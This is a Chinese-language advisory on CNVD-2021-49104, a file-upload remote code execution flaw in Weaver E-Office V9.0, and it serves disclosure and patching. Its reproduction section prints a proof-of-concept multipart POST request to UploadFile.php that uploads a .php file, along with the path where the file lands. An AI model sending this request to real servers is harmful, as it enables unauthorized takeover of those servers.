0x00 前言
最近网络上曝光了大量情报,揭示了泛微E-Office文件上传漏洞的在野利用信息,该漏洞编号为CNVD-2021-49104。公开情报指出,攻击者可以通过构建特殊请求包利用该漏洞上传恶意文件,最终实现远程代码执行。
0x01 漏洞背景
泛微E-Office是泛微旗下的一款标准协同移动办公平台。该漏洞的根本原因在于E-Office未能正确处理上传模块中用户的输入数据,使攻击者能够构造恶意的上传数据包,最终实现任意代码执行并获取服务器控制权。
0x02 危害等级
- 攻击途径:远程网络
- 攻击复杂度:低
- 认证:一次
- 机密性:完全地
- 完整性:完全地
- 可用性:完全地
- 利用条件:无权限要求
- 交互要求:0 click
- 漏洞危害:高危、远程代码执行
0x03 版本影响
- 产品版本:泛微E-Office V9.0
- 是否涉及:是
0x04 漏洞分析
通过网络空间测绘引擎对涉事资产【E-Office】进行搜索,最近一年内存在1809条独立IP资产和3100多条匹配结果。
漏洞点可通过厂商发布的漏洞补丁判断,如下为官方修复漏洞后的代码片段。
厂商对上传文件后缀名进行了文件后缀的白名单校验,鉴于该漏洞利用门槛低且危害巨大,强烈建议使用该系统的用户立即修复该漏洞。
0x05 漏洞复现
- 打开相关产品页面
- 使用Burp抓包,构造以下请求:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=hi7jm3fncr0q79du7tvu3bm406
Content-Length: 193
Content-Type: multipart/form-data;boundary=e64bdf16c554bbc109cecef6451c26a4
–e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name=”Filedata”; filename=”test.php”
Content-Type: image/jpeg
–e64bdf16c554bbc109cecef6451c26a4–
- 上传成功后访问路径:/images/logo/logo-eoffice.php
0x06 处置建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。漏洞补丁链接:http://v10.e-office.cn/eoffice9update/safepack.zip。建议在升级前进行数据备份,以避免意外情况的发生。
暂无评论内容